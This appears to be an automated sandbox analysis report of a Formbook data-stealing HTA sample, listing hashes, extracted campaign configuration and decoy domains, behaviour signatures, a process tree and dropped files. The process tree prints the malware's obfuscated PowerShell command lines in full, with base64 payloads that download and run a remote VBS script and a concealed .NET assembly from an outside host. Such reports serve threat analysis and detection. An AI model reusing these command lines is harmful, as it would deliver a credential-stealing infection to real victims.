Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-02-2025 03:45

General

  • Target

    56966ff863d37f048e873725f57c3d6ea7883c4c20c033f2bd5f85adeec1b62b.hta

  • Size

    14KB

  • MD5

    24a0a0feeb3c8ddf4e0a8480107d5a47

  • SHA1

    826364c4e1b951b3cb5d0c5d82db4a8e59e05140

  • SHA256

    56966ff863d37f048e873725f57c3d6ea7883c4c20c033f2bd5f85adeec1b62b

  • SHA512

    2c318b518bf94a264dfc6ae8938a00b7f915a38f7105b4c7df7799fd242b9906e4147644f26b5f2ecdcf892f5186efcd9c5182ef1e8f155b460a24d7ba5cac3e

  • SSDEEP

    48:3aodOOQvMUUdOOQHnMUvMxyhz+rntkpyr+slA6Y8TurdkGijmQdkrC3dOOQe0dO1:qoOMhQM1AhmtscdlRB/arEY/PMfW+

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

b101

Decoy

ent-apartments-2801.click

lsyw.top

eccurastock.online

j958.net

eepelement.tech

rueblueimpact.shop

etechhome.net

ianchui.cfd

mall-business-22321.bond

tatewidefinancialservices.net

orbitmac.info

ovehkjepe88.club

zzhmamn.xyz

uslimbooking.net

uto253.pro

ortalexpresscliepr.lat

tikk.shop

iaoniang.cfd

sdg-6603.cyou

myd.net

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook family
  • Formbook payload 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3404
    • C:\Windows\SysWOW64\mshta.exe
      C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\56966ff863d37f048e873725f57c3d6ea7883c4c20c033f2bd5f85adeec1b62b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4684
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/C PoWeRSHelL.exE -EX BYPAsS -nOp -W 1 -c dEVICeCREdEnTIAlDeplOymEnT.Exe ; inVoKe-ExprEsSion($(INVOKe-exPrESSiON('[sYSTEM.Text.EncOdINg]'+[chAr]58+[CHAR]0X3A+'UTF8.GetsTRIng([SYSTem.cONVErt]'+[CHAr]0x3a+[CHaR]0X3a+'FroMbAsE64sTRING('+[ChAr]0X22+'JDdCUEZBRDBaMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CRXJkZUZJbklUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZrcU16UmNQTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVVl6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBreVhyTGRULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmYSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieENOZGVoTGkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckV4SEljZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ3QlBGQUQwWjA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMjMuMTg3LjE1MC94YW1wcC9mYm4vbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZnUuZ0lGIiwiJEVOdjpBUFBEQVRBXG5pY2V0b21lZXR5b3VsaXR0bGVoZWFydHN3ZWV0aGVhcnRzaGVpc2JlYXV0aWYudmJzIiwwLDApO1NUQVJULXNMRWVQKDMpO0ludk9LRS1pVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZi52YnMi'+[CHAR]0x22+'))')))"
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3472
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          PoWeRSHelL.exE -EX BYPAsS -nOp -W 1 -c dEVICeCREdEnTIAlDeplOymEnT.Exe ; inVoKe-ExprEsSion($(INVOKe-exPrESSiON('[sYSTEM.Text.EncOdINg]'+[chAr]58+[CHAR]0X3A+'UTF8.GetsTRIng([SYSTem.cONVErt]'+[CHAr]0x3a+[CHaR]0X3a+'FroMbAsE64sTRING('+[ChAr]0X22+'JDdCUEZBRDBaMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CRXJkZUZJbklUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZrcU16UmNQTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVVl6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBreVhyTGRULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmYSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieENOZGVoTGkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckV4SEljZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ3QlBGQUQwWjA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMjMuMTg3LjE1MC94YW1wcC9mYm4vbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZnUuZ0lGIiwiJEVOdjpBUFBEQVRBXG5pY2V0b21lZXR5b3VsaXR0bGVoZWFydHN3ZWV0aGVhcnRzaGVpc2JlYXV0aWYudmJzIiwwLDApO1NUQVJULXNMRWVQKDMpO0ludk9LRS1pVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZi52YnMi'+[CHAR]0x22+'))')))"
          4⤵
          • Blocklisted process makes network request
          • Evasion via Device Credential Deployment
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:60
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0gpoky2y\0gpoky2y.cmdline"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1212
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1934.tmp" "c:\Users\Admin\AppData\Local\Temp\0gpoky2y\CSCDB1E7602D34D498EB3B53713F7EBC365.TMP"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3564
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicetomeetyoulittleheartsweetheartsheisbeautif.vbs"
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2280
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBtAHIAbwBmAG4AZQBlAHMAcgBlAHYAZQByAG8AZgBsAHIAaQBnAGwAdQBmAGkAdAB1AGEAZQBiAGwAcgBpAGcAdABzAGUAYgBsAHIAaQBnAGUAYwBpAG4ALwBuAGIAZgAvAHAAcABtAGEAeAAvADAANQAxAC4ANwA4ADEALgAzADIALgA4ADkAMQAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAMwAzADQANQAzADMALwBhAGwAYwBiADQAaAB0AG8AbAB6AHYAZgBoAHoAegB1AGYAcQBoADUALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAGEAcwBwAG4AZQB0AF8AYwBvAG0AcABpAGwAZQByACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4456
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                7⤵
                  PID:4512
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  7⤵
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3316
      • C:\Windows\SysWOW64\raserver.exe
        "C:\Windows\SysWOW64\raserver.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3872
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1512

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      9faf6f9cd1992cdebfd8e34b48ea9330

      SHA1

      ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

      SHA256

      0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

      SHA512

      05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      19KB

      MD5

      456d96ad5e8897661dc388d1e8687ee8

      SHA1

      07b2851f1517c9b1e884db37522e11b1672dc9a6

      SHA256

      0dd115a60e32491984740368fa37c3f716f439e7fd9d70cd7d6db0bd3e1105e9

      SHA512

      472bf83b4c465314db12c7449ba51a6d4e0f12fdf5f2c2d9f5b9d7a7dce95accc9c48f960886823d7b48685610e10fec4913c5ebd4e8921359d18455b5bc6e96

    • C:\Users\Admin\AppData\Local\Temp\0gpoky2y\0gpoky2y.dll

      Filesize

      3KB

      MD5

      53305cc5d6b39b05def1ad41f9573ac0

      SHA1

      319325879ddba7d5416ca3c22c3da353a266c157

      SHA256

      66a0d1ab3681199c89cfbc0c371edc3be860a8808d1448ea9bfc5600bd863c6b

      SHA512

      92bc4d8e07f4876fb7c9938e342ce4b4ef422a35e2d905bab5d1560e134adbe607800b37c5da37030b644c8c08584c03d7eb9201ade9a7a78ac701c0d9c3eed2

    • C:\Users\Admin\AppData\Local\Temp\RES1934.tmp

      Filesize

      1KB

      MD5

      a3d6737f084ac2e4aad705d514c15e4c

      SHA1

      4d165b3ad3cbd674ffb2dcc04f6947539b577fbc

      SHA256

      785ad786ee90d6e96e0e557c61d857020396319aac6a1ecef94940b3c028357a

      SHA512

      dab233b5a2e6829e5dcde4fbed98c0b1ad153b3530abbf717c14c01b5ba1cbbf495c079482e7d97bbd9aa7a3fd83e244cb3462caac4b21ffd91f192b47217de6

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ijvj04ni.r3i.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\nicetomeetyoulittleheartsweetheartsheisbeautif.vbs

      Filesize

      216KB

      MD5

      eaaecea977e9d02eb3ba12a426b9930d

      SHA1

      1b1d388b1aace23874ab95ad625f1e34ee43e234

      SHA256

      5b8920b32beba0b9c5cadf86e0e48d3df9cf33b89ed878efc06ca07ba7122f18

      SHA512

      929d244152855e99319f46f0f7d022fa127d4f628afebd26b6597e8c10265ba75eb9f1150dc0346ef51719f331f62a13669a8a366d2689996788b0d2601121e8

    • \??\c:\Users\Admin\AppData\Local\Temp\0gpoky2y\0gpoky2y.0.cs

      Filesize

      478B

      MD5

      19c349f194ea440d75e3d8bb016a48c1

      SHA1

      e4c63d11e4345744be72671c3f698ba717fca329

      SHA256

      54d8a84d51dffcb3b93aa8c8571f35fcf1c6a567574a138f9b803479b6aad974

      SHA512

      c9cc5ac32184f5771a22e8ff0de1812d4e4e0e1a8236d8660be761382983eeced98333ff6845c70ab999c52a94d64939e50d24cc4b3caab4d80c79e5267dfb71

    • \??\c:\Users\Admin\AppData\Local\Temp\0gpoky2y\0gpoky2y.cmdline

      Filesize

      369B

      MD5

      04c13c4911f416f5d83b5db17e9e8e4d

      SHA1

      1e6cbbb7a8aecafef0be02a76abaea4c3b04e974

      SHA256

      e4783166b5d846ed53e3751078c7544b8c7faabcb2d655a73b28df79944c7bb5

      SHA512

      cf0599e12c7dded51b1991cb07785329372adf1b697cb95b231b14ec70ede0a55b9e8e9d160238494e8ba3e94020b8acdc797d74e34ae49c2426c85081b8d7e8

    • \??\c:\Users\Admin\AppData\Local\Temp\0gpoky2y\CSCDB1E7602D34D498EB3B53713F7EBC365.TMP

      Filesize

      652B

      MD5

      902eda9f4da644b9af166c0232bcf73c

      SHA1

      76b1c0de992822019dd6d3c21d500f87b8303db7

      SHA256

      ffd44031f6dc86ce35120a263acae9e61e6c1acf2c64145affe64a93b6b180ab

      SHA512

      a1bd2c8e5dab3da6a9c4ca0965e73ac16a4430d0218876408f9348dc5f270407bd6ed1679ddc2226cd31f94a7b45f86da04c6eb4ba2fe7e24e0c9cf5f292a61b

    • memory/60-43-0x0000000007AA0000-0x0000000007AB4000-memory.dmp

      Filesize

      80KB

    • memory/60-6-0x0000000005E60000-0x0000000005EC6000-memory.dmp

      Filesize

      408KB

    • memory/60-19-0x0000000006550000-0x000000000659C000-memory.dmp

      Filesize

      304KB

    • memory/60-21-0x000000006D2A0000-0x000000006D2EC000-memory.dmp

      Filesize

      304KB

    • memory/60-22-0x00000000709E0000-0x0000000071190000-memory.dmp

      Filesize

      7.7MB

    • memory/60-20-0x00000000074F0000-0x0000000007522000-memory.dmp

      Filesize

      200KB

    • memory/60-23-0x000000006D440000-0x000000006D794000-memory.dmp

      Filesize

      3.3MB

    • memory/60-33-0x00000000709E0000-0x0000000071190000-memory.dmp

      Filesize

      7.7MB

    • memory/60-34-0x0000000006B10000-0x0000000006B2E000-memory.dmp

      Filesize

      120KB

    • memory/60-35-0x00000000077E0000-0x0000000007883000-memory.dmp

      Filesize

      652KB

    • memory/60-36-0x00000000709E0000-0x0000000071190000-memory.dmp

      Filesize

      7.7MB

    • memory/60-37-0x0000000007F10000-0x000000000858A000-memory.dmp

      Filesize

      6.5MB

    • memory/60-38-0x00000000075B0000-0x00000000075CA000-memory.dmp

      Filesize

      104KB

    • memory/60-39-0x00000000078E0000-0x00000000078EA000-memory.dmp

      Filesize

      40KB

    • memory/60-40-0x0000000007B00000-0x0000000007B96000-memory.dmp

      Filesize

      600KB

    • memory/60-41-0x0000000007A60000-0x0000000007A71000-memory.dmp

      Filesize

      68KB

    • memory/60-42-0x0000000007A90000-0x0000000007A9E000-memory.dmp

      Filesize

      56KB

    • memory/60-0-0x00000000709EE000-0x00000000709EF000-memory.dmp

      Filesize

      4KB

    • memory/60-44-0x0000000007AE0000-0x0000000007AFA000-memory.dmp

      Filesize

      104KB

    • memory/60-45-0x0000000007AD0000-0x0000000007AD8000-memory.dmp

      Filesize

      32KB

    • memory/60-17-0x0000000005F40000-0x0000000006294000-memory.dmp

      Filesize

      3.3MB

    • memory/60-18-0x0000000006530000-0x000000000654E000-memory.dmp

      Filesize

      120KB

    • memory/60-7-0x0000000005ED0000-0x0000000005F36000-memory.dmp

      Filesize

      408KB

    • memory/60-5-0x0000000005550000-0x0000000005572000-memory.dmp

      Filesize

      136KB

    • memory/60-58-0x0000000007AD0000-0x0000000007AD8000-memory.dmp

      Filesize

      32KB

    • memory/60-4-0x00000000709E0000-0x0000000071190000-memory.dmp

      Filesize

      7.7MB

    • memory/60-64-0x00000000709EE000-0x00000000709EF000-memory.dmp

      Filesize

      4KB

    • memory/60-65-0x00000000709E0000-0x0000000071190000-memory.dmp

      Filesize

      7.7MB

    • memory/60-66-0x00000000709E0000-0x0000000071190000-memory.dmp

      Filesize

      7.7MB

    • memory/60-67-0x0000000007D90000-0x0000000007DB2000-memory.dmp

      Filesize

      136KB

    • memory/60-68-0x0000000008B40000-0x00000000090E4000-memory.dmp

      Filesize

      5.6MB

    • memory/60-3-0x0000000005650000-0x0000000005C78000-memory.dmp

      Filesize

      6.2MB

    • memory/60-74-0x00000000709E0000-0x0000000071190000-memory.dmp

      Filesize

      7.7MB

    • memory/60-2-0x00000000709E0000-0x0000000071190000-memory.dmp

      Filesize

      7.7MB

    • memory/60-1-0x0000000002F60000-0x0000000002F96000-memory.dmp

      Filesize

      216KB

    • memory/3316-90-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

    • memory/3404-99-0x0000000007F60000-0x0000000008015000-memory.dmp

      Filesize

      724KB

    • memory/3872-93-0x0000000000020000-0x000000000003F000-memory.dmp

      Filesize

      124KB

    • memory/3872-94-0x0000000000020000-0x000000000003F000-memory.dmp

      Filesize

      124KB

    • memory/3872-95-0x00000000004A0000-0x00000000004CF000-memory.dmp

      Filesize

      188KB

    • memory/4456-85-0x0000000005AD0000-0x0000000005E24000-memory.dmp

      Filesize

      3.3MB

    • memory/4456-87-0x0000000004E90000-0x0000000004EA2000-memory.dmp

      Filesize

      72KB

    • memory/4456-88-0x00000000076A0000-0x000000000773C000-memory.dmp

      Filesize

      624KB

    • memory/4456-89-0x0000000004E60000-0x0000000004E66000-memory.dmp

      Filesize

      24KB